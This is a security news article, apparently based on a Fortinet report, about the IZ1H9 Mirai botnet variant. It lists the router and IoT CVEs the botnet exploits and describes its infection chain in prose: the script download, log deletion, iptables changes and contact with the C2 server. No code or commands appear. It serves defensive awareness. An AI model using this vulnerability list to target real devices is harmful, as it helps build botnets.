Mirai-Based DDoS Malware Variant Expands Targets with 13 Router Exploits
The Mirai-based DDoS malware botnet, known as IZ1H9, has recently become active again, “adding” 13 new payloads to Linux routers including D-Link, Zyxel, TP-Link, TOTOLINK, and more.
According to security researchers at Fortinet, the utilization of IZ1H9 malware reached a historic peak during the first week of September, with tens of thousands of exploit attempts targeting vulnerable devices. Once successfully infiltrating a victim’s device, IZ1H9 adds it to the DDoS group and initiates DDoS attacks on specified targets.
As we know, the more devices and vulnerabilities a DDoS malware targets, the greater the likelihood of establishing a large and powerful botnet to launch massive attacks on targeted websites. In the case of IZ1H9, Fortinet’s report states that it exploits multiple vulnerabilities dating from 2015 to 2023, including:
– D-Link devices: CVE-2015-1187, CVE-2016-20017, CVE-2020-25506, CVE-2021-45382
– Netis WF2419: CVE-2019-19356
– Sunhillo SureLine (prior to version 8.7.0.1.1): CVE-2021-36380
– Geutebruck products: CVE-2021-33544, CVE-2021-33548, CVE-2021-33549, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
– Yealink Device Management (DM) 3.6.0.20: CVE-2021-27561, CVE-2021-27562
– Zyxel EMG3525/VMG1312 (prior to V5.50): Unspecified CVE, but targeting the /bin/zhttpd/ component vulnerability in Zyxel devices
– TP-Link Archer AX21 (AX1800): CVE-2023-1389
– Korenix JetWave wireless AP: CVE-2023-23295
– TOTOLINK routers: CVE-2022-40475, CVE-2022-25080, CVE-2022-25079, CVE-2022-25081, CVE-2022-25082, CVE-2022-25078, CVE-2022-25084, CVE-2022-25077, CVE-2022-25076, CVE-2022-38511, CVE-2022-25075, CVE-2022-25083
IZ1H9’s network attack campaign also targets the “/cgi-bin/login.cgi” route-associated vulnerability, which could impact Prolink PRC2402M routers.
Upon exploiting these vulnerabilities, the IZ1H9 payload is immediately injected into the targeted victim’s device, which includes a command to download a shell script downloader named “l.sh” from a specified URL. After executing the script, it deletes logs to conceal malicious activities and proceeds to obtain customized bot clients for different system architectures.
Finally, the script modifies the device’s iptables rules to hinder connections on specific ports, making it more difficult for device administrators to remove the malware.
Once all the operations are completed, the IZ1H9 botnet establishes communication with the command and control (C2) server, awaiting instructions. It is reported that the supported commands involve various types of DDoS attacks, including UDP, UDP Plain, HTTP Flood, and TCP SYN.
Fortinet’s report also highlights that the data portion of IZ1H9 contains hard-coded credentials for brute force attacks. These attacks could potentially spread to adjacent devices within the target or authenticate against unsecured IoT devices lacking effective utilization.
In conclusion, cybersecurity experts recommend that owners of IoT devices use strong administrative credentials and update them to the latest available firmware versions. Additionally, they should minimize the frequency of exposing devices to the public internet whenever possible.
Source:
Bleeping Computer. “Mirai DDoS Malware Variant Expands Targets with 13 Router Exploits.” [Link]